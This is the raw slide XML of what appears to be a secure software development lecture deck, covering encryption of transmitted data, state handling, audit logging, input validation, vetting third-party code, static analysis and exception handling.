            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Cleartext Transmit of Sensitive Info</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47107" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{251A3B39-C79C-4E92-AAEF-9D7A51A37CAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4267200"/>
            <a:ext cx="8229600" cy="1866900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="1"/>
              <a:t>Fix:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Encrypt data with standard, reliable encryption before transmission</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47108" name="Picture 7" descr="j0091049[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BE2AA0A-7311-47A4-A17D-33CCC1842010}"/>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2819400" y="2057400"/>
            <a:ext cx="3452813" cy="1866900"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47109" name="Text Box 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67CA4EF2-CD75-4B0A-9BA6-7DC096DD58DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362200" y="3962400"/>
            <a:ext cx="3346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a:t>Login: Ginger  Password: Snap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47110" name="Picture 9" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4542FDF1-604A-4669-AAE8-38AAD5F2167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5334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EF61FC4-1832-0789-E205-9C776D60CEE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Open Design</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> often-public secure software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>built to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>withstand the test of time. </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survives based on the strength of the security algorithm and correctness of implementation</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Secure software utilities include: </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input sanitization software</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Ciphers (encryption) </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integrity</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authentication, authorization</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session management</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logging</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good random number generators.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ven tried-and-true open source software can get out-of-date or encounter injection attacks: Verify &amp; test well</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{224C143F-E68C-2F05-CFF5-3ECE4F6F3D94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secure Software Utilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="85706671"/>
      </p:ext>
    </p:extLst>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D66CDB3C-A879-4876-98F3-36394BB7593A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520700" y="609601"/>
            <a:ext cx="8154988" cy="806450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Control:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Control Critical State Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30723" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D79563C-5BDD-4125-B793-EA4DC02C18A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Understand all locations that are accessible to attackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Do not keep state info on client without using encryption and integrity checking (e.g. hashing)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Option: Store state info on server side only: ASP.NET View State, OWASP ESAPI Session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>Mgmt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5580357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6034918-BD71-1D7B-DA4F-AC0909928EE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1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Logs for audit purposes (as opposed to debug) should include: </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identity (e.g., username or email and IP address); </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UTC time and date; </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event code, </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description and </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outcome. </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Important events to log include:</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user authentication/authorization</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changes to configuration for security or logging</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logging maintenance activities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94BBAC4B-D8EB-2E27-4530-8B3BB8C059C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logging</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="344514079"/>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4F2E1-79B1-4E74-81B4-EC88B4E5915E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Validating Input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C3D8693-7114-4432-91FE-1C590F14E75B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL attacks, Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site Scripting, Cross-site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chatty Error Messages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27455349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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25468721-9FAE-4625-AA4E-1523E26B63BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="531812" y="822669"/>
            <a:ext cx="8154988" cy="498475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Problem:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Adopting Untrusted Software</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54275" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F86C972D-0431-4549-9C95-A692B68B1D95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3861576" y="2025732"/>
            <a:ext cx="5282424" cy="3886200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Obtain code only from trusted (preferably signed) sites over secured links</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Remove unnecessary features, files, components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Review code to ensure it meets internal standards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Monitor for new vulnerabilities (e.g., CVE), patches, maintenance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54278" name="Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FE63A8D-7094-4420-B163-2908C6216F68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="994670" y="3586348"/>
            <a:ext cx="2017703" cy="490724"/>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54279" name="Text Box 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{648C39F5-24FA-4E6F-B67E-E7B09EE13E11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="787562">
            <a:off x="1417608" y="3846951"/>
            <a:ext cx="121058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Download</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>File</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54280" name="Text Box 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8487CBC6-E99D-40BE-9AD8-B37103F7099E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="634299" y="4689661"/>
            <a:ext cx="2990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a:t>Free Software … Is it Safe?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54281" name="Picture 12" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95B62A52-0557-4E57-9846-CA2DEE9950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5334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82" name="Picture 13" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B98EA2C2-486B-4BC0-99FE-10833806F5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5334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83" name="Picture 14" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD70E83A-81AA-48A2-813B-295931285A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5334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8E10BF4B-F421-482C-9DED-1F02E2FE2A29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="679517" y="2415237"/>
            <a:ext cx="1008113" cy="922667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21232A84-F650-41B3-8A41-D89578C9D55C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="2057400"/>
            <a:ext cx="1076485" cy="4448152"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Line 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ED1314F-A927-4F98-A6F3-A85A65FC64B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="972370" y="3179618"/>
            <a:ext cx="11151" cy="33528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4345561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E20EA6-41CF-8FC9-A13C-7EDD8D1D9D51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Never Expose Internal Data Structures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:  Web programmers may send information within forms or encoded URLs to help servers process them once transactions are submitted back.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Information may consist of internal coding data in the form of database keys, object references or IDs, or file references.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attacker can manipulate this information within forms to directly access other records or resources.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To prevent attacks on integrity, perform all transaction translations at the server, and/or use strong encryption/integrity to cipher internal information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Use Static Analysis Tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:  Static analysis inspects the code without execution. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can occur via code inspections and/or automated testing.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automated static analysis tools provide warnings beyond what compilers provide. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recommendation: fix all warnings. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May point out variable or environment contents that may not be initialized, preventing leaks. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECE61F22-60A9-CEE0-0D73-DEA129D2E282}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lower-level Programming Rules</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3845292124"/>
      </p:ext>
    </p:extLst>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E20EA6-41CF-8FC9-A13C-7EDD8D1D9D51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Manage Exceptions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:  Problems may occur due to operational failures of hardware, software components or networks, or due to permission failures or revocations, policy failures, and context invalidations, etc.   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When an exception occurs, the programmer can abort, continue or commit (complete) the operation </a:t>
            </a:r>
